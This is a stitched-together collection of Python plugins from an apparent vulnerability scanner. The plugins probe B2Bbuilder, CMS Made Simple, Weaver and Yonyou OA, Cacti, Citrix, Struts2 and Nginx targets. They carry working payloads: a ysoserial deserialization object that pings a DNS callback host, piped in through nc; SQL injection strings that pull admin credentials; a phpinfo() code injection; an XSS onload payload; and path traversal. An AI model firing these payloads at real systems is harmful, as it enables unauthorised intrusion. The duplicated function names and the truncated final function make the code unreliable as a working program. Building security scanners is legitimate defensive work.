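def medusa(Url,RandomAgent,UnixTimestamp):
    """Pipe a ysoserial CommonsCollections5 object to the target and report a DNS callback.

    The host and port are parsed from ``Url``; the serialized object is
    produced by the ysoserial jar and sent to the target with ``nc``. A
    finding is recorded only when ``Dnslog().result()`` is truthy afterwards.
    ``RandomAgent`` is not used by this check. Any exception is logged through
    ``ErrorLog`` and swallowed; the function always returns ``None``.
    """
    import shlex  # local import: the file's import block is not visible from here

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        dns=Dnslog()
        # The command line is handed to a shell, so every interpolated value is
        # quoted: a target string containing shell metacharacters must not be
        # able to run commands on the machine that runs the scanner.
        command = 'java -jar {} CommonsCollections5 {} | nc {} {}'.format(
            shlex.quote(str(Ysoserial().result())),
            shlex.quote("ping {}".format(dns.dns_host())),
            shlex.quote(str(url)),
            shlex.quote(str(port)))
        os.system(command)

        if dns.result():
            # NOTE(review): the report text names log4j although the command
            # builds a CommonsCollections5 object; confirm which finding this
            # plugin is meant to report.
            Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(url,scheme + "://" + url +":"+ str(port))
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # pass in the url and the scan result
            ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file: url is the target file name, Medusa is the result
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the URL and the name of the failing plugin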
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check whether ``/5clib/property.action`` is readable without authorisation.

    Sends one GET to that path on the host and port parsed from ``Url``. A
    200 response whose body contains both ``DEFAULT_PDF_LIB_PATH`` and
    ``DEFAULT_SQL_BACKUP_PATH`` is recorded as a finding, and the full body is
    copied into the report. Any exception is logged and swallowed; the
    function always returns ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        probe_url = scheme + "://" + url + ":" + str(port) + "/5clib/property.action"
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        # NOTE: verify=False turns off TLS certificate validation for this probe.
        http = requests.session()
        reply = http.get(probe_url, headers=request_headers, timeout=6, verify=False)
        body = reply.text
        exposed = (reply.status_code == 200
                   and 'DEFAULT_PDF_LIB_PATH' in body
                   and 'DEFAULT_SQL_BACKUP_PATH' in body)
        if exposed:
            Medusa = "{}存在五车图书管理系统存在越权漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, probe_url, body)
            _t = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan result.
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Log the URL and the name of the failing plugin.
        _l = ClassCongregation.ErrorLog().Write(url, _)
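def Main(Url, FileName, Values, ProxyIp):
    """Run every B2Bbuilder plugin against ``Url`` and write each result to ``FileName``.

    The plugin calls happen while the ``Medusa`` list is being built, so all
    requests have already been sent before the progress bar starts; the bar
    only tracks the writes. Write failures are deliberately ignored
    (best effort), and the function returns ``None``.
    """
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # instantiate the WriteFile helper with the output file name (required step)
    ua = ClassCongregation.UserAgentS(Values)  # user-supplied browser header selection
    RandomAgent = ua.UserAgent()  # the generated User-Agent value
    Medusa = [
        B2BbuilderBackgroundCommandExecutionVulnerability.medusa(
            Url, RandomAgent, ProxyIp),
        B2BbuilderContainsVulnerabilitiesLocally.medusa(
            Url, RandomAgent, ProxyIp),
        B2BbuilderHeadSQLInjectionVulnerability.medusa(Url, RandomAgent,
                                                       ProxyIp),
        B2BbuilderSQLInjectionVulnerability.medusa(Url, RandomAgent, ProxyIp),
        B2BbuilderSQLInjectionVulnerability2.medusa(Url, RandomAgent, ProxyIp),
        B2BbuilderSQLInjectionVulnerability3.medusa(Url, RandomAgent, ProxyIp),
        B2BbuilderSQLInjectionVulnerability4.medusa(Url, RandomAgent, ProxyIp),
    ]
    try:
        for i in tqdm(Medusa, ascii=True, desc="B2Bbuilder plugin progress"):
            WriteFile.Write(str(i))
    except Exception:
        # Still best effort, but no longer a bare ``except``: Ctrl-C and
        # SystemExit must be able to stop a running scan.
        pass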
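def medusa(**kwargs)->None:
    """Check the CMS Made Simple installer page for reflected script injection.

    Reads ``Url``, ``Headers`` and ``Proxies`` from ``kwargs``, posts a form
    value carrying a random marker to the installer path and records a finding
    when a 200 response echoes that marker. Any exception is passed to
    ``ErrorHandling`` and ``ErrorLog`` and then swallowed.
    """
    url = kwargs.get("Url")  # target url passed by the caller
    Headers = kwargs.get("Headers")  # request headers passed by the caller
    proxies = kwargs.get("Proxies")  # proxy settings passed by the caller
    try:
        # Random marker: a fixed string could already be present in the page.
        RD=ClassCongregation.randoms().result(20)
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD)
        payload_url = url + payload

        # NOTE: verify=False turns off TLS certificate validation for this probe.
        resp = requests.post(payload_url, data=data,headers=Headers,proxies=proxies, timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # pass in the response and the scan result
            ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file: url is the target file name, Medusa is the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # format() instead of "+": when "Url" is missing (url is None) or the
        # plugin name lookup returns None, string concatenation would raise a
        # second TypeError from inside this handler and hide the real error.
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url),e)  # write the error log entry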
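def medusa(Url, RandomAgent, ProxyIp):
    """Post the module-level ``post_data`` to ``payload`` and look for command output.

    A 200 response whose lower-cased body contains ``system:`` or ``root:``
    is recorded as a high-severity finding. ``payload`` and ``post_data`` are
    defined outside this function. ``ProxyIp`` is accepted but not used here.
    Any exception is logged and swallowed; the function returns ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80

    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            "Referer": payload_url,
            "Cookie": "JSESSIONID=abcT_7z-8zGPy7QoU_n1w; testBanCookie=test",
            "Content-Type": "application/x-www-form-urlencoded",
            'User-Agent': RandomAgent,
        }
        # NOTE: verify=False turns off TLS certificate validation for this probe.
        resp = requests.post(payload_url,
                             data=post_data,
                             headers=headers,
                             timeout=10,
                             verify=False)
        # Use the decoded text: resp.content is bytes, and bytes.find() with a
        # str argument raises TypeError on Python 3, which the handler below
        # swallowed, so the check could never report a finding.
        con = resp.text.lower()
        code = resp.status_code
        if code == 200 and (con.find('system:') != -1
                            or con.find('root:') != -1):
            Medusa = "{} 存在泛微OA远程代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(
                url, payload_url, post_data)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url is the target file name, Medusa is the result
    except Exception:
        # Narrowed from a bare ``except`` so Ctrl-C can stop the scan.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the error log entry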
def BoomDB(Url, SqlUser, SqlPasswrod, InputFileName):
    """Run the database credential check for one URL or for every line of a file.

    Nothing happens unless at least one of ``SqlUser`` / ``SqlPasswrod`` (the
    account and password word-list files, per the original comment) is given.
    With no ``InputFileName`` the single ``Url`` is checked; otherwise each
    line of that file is passed on as a target. Returns ``None``.
    """
    if not (SqlUser != None or SqlPasswrod != None):
        return

    # The feature is enabled as soon as either word list is supplied.
    checker = ClassCongregation.BlastingDB(SqlUser, SqlPasswrod)

    if InputFileName == None:
        # Not a batch scan: use the single URL.
        checker.BoomDB(Url)
        return

    # Batch scan: feed the targets one by one.
    with open(InputFileName, encoding='utf-8') as targets:
        for target_line in targets:
            # NOTE(review): the line is passed on with its trailing newline;
            # confirm that BlastingDB.BoomDB strips it.
            checker.BoomDB(target_line)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check ``/index.php`` for SQL injection through the ``X-Forwarded-For`` header.

    Sends one GET with a crafted ``X-Forwarded-For`` value and records a
    finding when a 200 response contains the fixed hex marker below
    (presumably the digest the injected expression computes; not shown
    here). The full response body is copied into the report. Any exception
    is logged and swallowed; the function returns ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        probe_url = scheme + "://" + url + ":" + str(port) + "/index.php"

        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "X-Forwarded-For":
            "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(c),user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1",
        }

        # NOTE: verify=False turns off TLS certificate validation for this probe.
        http = requests.session()
        reply = http.get(probe_url, headers=request_headers, timeout=6, verify=False)
        body = reply.text
        marker_seen = "4a8a08f09d37b73795649038408b5f33" in body
        if reply.status_code == 200 and marker_seen:
            Medusa = "{}存在B2Bbuilder头部SQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, probe_url, body)
            _t = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan result.
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Log the URL and the name of the failing plugin.
        _l = ClassCongregation.ErrorLog().Write(url, _)
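def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Request the module-level ``Payload`` path and look for file content in the reply.

    A 200 response whose lower-cased body contains both ``bin`` and ``root``
    is recorded as a finding. ``Payload`` is defined outside this function.
    Any exception is passed to ``ErrorHandling`` and ``ErrorLog`` and then
    swallowed.

    Args:
        Url: target URL; scheme, host and port are parsed from it.
        Headers: base request headers. They are copied, not modified.
        proxies: proxy setting, resolved through ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
    host = url + ':' + str(port)

    # Work on a copy: writing Host/Accept/Connection into the caller's dict
    # would leak this target's Host header into whatever request reuses it.
    Headers = dict(Headers)
    Headers['Host'] = host
    Headers[
        'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    Headers['Connection'] = 'close'

    try:
        resp = requests.get(PayloadUrl,
                            headers=Headers,
                            proxies=proxies,
                            timeout=5)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.lower().find('bin') != -1 and con.lower().find(
                'root') != -1:
            Medusa = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, PayloadUrl)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # pass in the url and the scan result
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url is the target file name, Medusa is the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  # write the error log entry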
def medusa(Url,RandomAgent,ProxyIp):
    """Post ``post_data`` to each path in ``payloads`` and look for the monitor page.

    ``payloads`` and ``post_data`` are defined outside this function. The
    first response whose lower-cased body contains both
    ``a8 management monitor`` and ``connections stack trace`` is reported as
    high severity, and ``str(_t.info)`` is returned. Without a match, or
    after an exception (logged and swallowed), the result is ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    global resp
    global resp2
    try:
        for path in payloads:
            payload_url = scheme+"://"+url+ ':' + str(port)+path
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            # NOTE: verify=False turns off TLS certificate validation.
            if ProxyIp==None:
                resp = requests.post(payload_url, data=post_data,headers=headers, timeout=5, verify=False)
            else:
                # A proxy address must be prefixed with http:// or https://.
                # Only the "http" key is set here.
                proxies = {"http": "http://" + str(ProxyIp)}
                resp = requests.post(payload_url, data=post_data, headers=headers, proxies=proxies, timeout=5, verify=False)
            body = resp.text.lower()
            if not ('a8 management monitor' in body and 'connections stack trace' in body):
                continue
            Medusa = "{} 存在用友OA_status存在默认密码漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,post_data)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious = critical, High = high, Intermediate = medium, Low = low
            return (str(_t.info))
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the error log entry
def medusa(Url, RandomAgent, ProxyIp):
    """Check whether ``/admin/module_translations.php`` evaluates its ``mod`` parameter.

    Sends one GET and records a high-severity finding when a 200 response
    contains both ``PHP Version`` and ``system``. The full body is copied into
    the report. ``ProxyIp`` is accepted but not used here. Any exception is
    logged and swallowed; the function returns ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        probe_path = '/admin/module_translations.php?mod=;phpinfo()'
        probe_url = scheme + "://" + url + ":" + str(port) + probe_path

        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        # NOTE: verify=False turns off TLS certificate validation for this probe.
        http = requests.session()
        reply = http.get(probe_url, headers=request_headers, timeout=6, verify=False)
        body = reply.text
        looks_like_phpinfo = "PHP Version" in body and "system" in body
        if reply.status_code == 200 and looks_like_phpinfo:
            Medusa = "{}存在B2Bbuilder后台命令执行漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, probe_url, body)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious = critical, High = high, Intermediate = medium, Low = low
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Log the URL and the name of the failing plugin.
        _l = ClassCongregation.ErrorLog().Write(url, _)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Request ``turl + payload`` for every entry of ``urls`` and look for netstat output.

    ``urls`` and ``payload`` are defined outside this function. Each response
    whose lower-cased body contains ``active internet connections`` is written
    to the result file and recorded as a finding. Errors are handled per
    request, so one failing path does not stop the remaining ones. Returns
    ``None``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    for base_path in urls:
        try:
            payload_url = scheme + "://" + url + ':' + str(port) + base_path + payload
            request_headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            # NOTE: verify=False turns off TLS certificate validation.
            reply = requests.get(payload_url,
                                 headers=request_headers,
                                 proxies=proxies,
                                 timeout=5,
                                 verify=False)
            if 'active internet connections' not in reply.text.lower():
                continue
            Medusa = "{}存在用友OA_ICC系统框架漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
            # Pass in the url and the scan result.
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, _)
            # Write the error log entry.
            _l = ClassCongregation.ErrorLog().Write(
                "Plugin Name:" + _ + " || Target Url:" + url, e)
def medusa(Url, RandomAgent, ProxyIp):
    """Post a crafted ``selected_items`` value to ``/cdef.php`` and look for a marker.

    A finding is recorded as high severity when the response body contains
    the fixed hex marker below; the status code is not checked. The full body
    is copied into the report. ``ProxyIp`` is accepted but not used here. Any
    exception is logged and swallowed; the function returns ``None``.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # Three adjacent literals that Python joins into one form body.
        data = "selected_items=a:1:{i:0;s:31:" ',benchmark(10000000,md5(c)),' ";}&drp_action=1 "
        probe_url = scheme + "://" + url + ":" + str(port) + "/cdef.php?action=actions"
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        # NOTE: verify=False turns off TLS certificate validation for this probe.
        http = requests.session()
        reply = http.post(probe_url,
                          headers=request_headers,
                          data=data,
                          timeout=6,
                          verify=False)
        body = reply.text
        if "4a8a08f09d37b73795649038408b5f33" in body:
            Medusa = "{}存在CactiSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, probe_url, body)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious = critical, High = high, Intermediate = medium, Low = low
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Log the URL and the name of the failing plugin.
        _l = ClassCongregation.ErrorLog().Write(url, _)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Request the module-level ``Payload`` path and look for file content in the reply.

    A 200 response whose lower-cased body contains both ``bin`` and ``root``
    is recorded as a finding. ``Payload`` is defined outside this function.
    TLS verification is left at the library default for this request. Any
    exception is logged and swallowed; the function returns ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
    request_headers = {
        'Host': url + ':' + str(port),
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
    }

    try:
        http = requests.session()
        reply = http.get(PayloadUrl, headers=request_headers, timeout=5)
        body = reply.text.lower()
        if reply.status_code == 200 and 'bin' in body and 'root' in body:
            Medusa = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, PayloadUrl)
            _t = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan result.
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Write the error log entry.
        _l = ClassCongregation.ErrorLog().Write(url, _)
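def medusa(Url, RandomAgent, UnixTimestamp):
    """Run two checks against the target: an error-based probe and a page exposure check.

    First, ``turl + payload`` is requested for every entry of the module-level
    ``urls``; a 500 response whose lower-cased body contains ``gqxmicrosoft``
    is recorded as a finding. Second, ``/include/get_user.aspx`` is requested
    and recorded when its body contains ``button_normal``. Errors are logged
    and swallowed per request; the function returns ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    for turl in urls:
        try:
            # The port is part of the URL here as well. It used to be left out,
            # so a target given with a non-default port was probed on the
            # scheme's default port, while the second check below used the
            # right one.
            payload_url = scheme + "://" + url + ':' + str(port) + turl + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            # NOTE: verify=False turns off TLS certificate validation.
            resp = requests.get(payload_url,
                                headers=headers,
                                timeout=5,
                                verify=False)
            con = resp.text
            code = resp.status_code
            if code == 500 and con.lower().find('gqxmicrosoft') != -1:
                Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                    url, payload_url)
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file: url is the target file name, Medusa is the result
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # pass in the url and the scan result
        except:
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # write the error log entry
    try:

        payload_url = scheme + "://" + url + ':' + str(
            port) + "/include/get_user.aspx"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=5,
                            verify=False)
        con = resp.text
        # The status code is not checked for this second probe.
        if con.lower().find('button_normal') != -1:
            Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # write to file: url is the target file name, Medusa is the result
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # pass in the url and the scan result

    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the error log entry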
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check the CMS Made Simple installer page for reflected script injection.

    Posts a form value carrying the fixed marker ``cscan-hyhmnn`` and records
    a finding when a 200 response echoes that marker. The full body is copied
    into the report. Any exception is logged and swallowed; the function
    returns ``None``.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        form_body = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert(cscan-hyhmnn)%3e&submit=Submit'''
        probe_url = (scheme + "://" + url + ":" + str(port)
                     + "/k/cms/cmsmadesimple/install/index.php?sessiontest=1")
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        # NOTE: verify=False turns off TLS certificate validation for this probe.
        http = requests.session()
        reply = http.post(probe_url,
                          data=form_body,
                          headers=request_headers,
                          timeout=6,
                          verify=False)
        body = reply.text
        if reply.status_code == 200 and 'cscan-hyhmnn' in body:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, probe_url, body)
            _t = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan result.
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Log the URL and the name of the failing plugin.
        _l = ClassCongregation.ErrorLog().Write(url, _)
def medusa(Url, RandomAgent, ProxyIp=None):
    """Check whether two ``/vpn/../vpns/`` paths are served by the gateway.

    Each path is requested in turn; a 200 response containing
    ``encrypt password`` is recorded as a high-severity finding with the full
    body copied into the report. ``ProxyIp`` is accepted but not used here.
    An exception on any request ends the loop; it is logged and swallowed.
    Returns ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        probe_paths = ["/vpn/../vpns/services.html", "/vpn/../vpns/cfg/smb.conf"]

        for probe_path in probe_paths:
            probe_url = scheme + '://' + url + ':' + str(port) + probe_path
            request_headers = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            }

            # NOTE: verify=False turns off TLS certificate validation.
            http = requests.session()
            reply = http.get(probe_url, headers=request_headers, timeout=6, verify=False)
            body = reply.text
            if reply.status_code != 200 or "encrypt password" not in body:
                continue
            Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format(
                url, probe_url, body)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious = critical, High = high, Intermediate = medium, Low = low
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Log the URL and the name of the failing plugin.
        _l = ClassCongregation.ErrorLog().Write(url, _)
def medusa(Url,RandomAgent,ProxyIp):
    """Post the module-level ``payload`` to ``/user.action`` and look for ``id`` output.

    A 200 response whose lower-cased body contains ``uid``, ``gid`` and
    ``groups`` is recorded as a high-severity finding. ``payload`` is defined
    outside this function. ``ProxyIp`` is accepted but not used here. Any
    exception is logged and swallowed; the function returns ``None``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    payload_url = scheme+"://"+url+':'+str(port)+'/user.action'
    request_headers = {
        'Host': url+':'+str(port),
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        # NOTE(review): fixed length copied from a captured request; confirm it
        # matches ``payload`` or let the HTTP library compute it.
        'Content-Length': '571',
        'DNT': '1',
        'Referer': payload_url,
        'Upgrade-Insecure-Requests': '1',
    }

    try:
        # NOTE: verify=False turns off TLS certificate validation for this probe.
        http = requests.session()
        reply = http.post(payload_url, data=payload, headers=request_headers, timeout=5, verify=False)
        body = reply.text.lower()
        shows_id_output = 'uid' in body and 'gid' in body and 'groups' in body
        if reply.status_code == 200 and shows_id_output:
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:2_0_0-2_2_3\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,payload)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious = critical, High = high, Intermediate = medium, Low = low
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Write the error log entry.
        _l = ClassCongregation.ErrorLog().Write(url, _)
def medusa(Url, RandomAgent, ProxyIp):
    """Request every path in ``payloads`` and collect the ones that echo a fixed marker.

    ``payloads`` is defined outside this function. Each response whose
    lower-cased body contains the hex marker below is reported as high
    severity and its report text collected. The function returns the ``info``
    of a ``VulnerabilityInfo`` built from the collected list, whether or not
    anything matched. An exception ends the loop and is logged as a warning.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Fall back to the scheme's well-known port when the URL carries none.
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    global resp
    global resp2
    Medusas = []
    try:
        for path in payloads:
            # NOTE(review): the port parsed above is not part of this URL, so
            # a non-default port appears to be ignored; confirm against
            # ``payloads``.
            payload_url = scheme + "://" + url + path
            request_headers = {
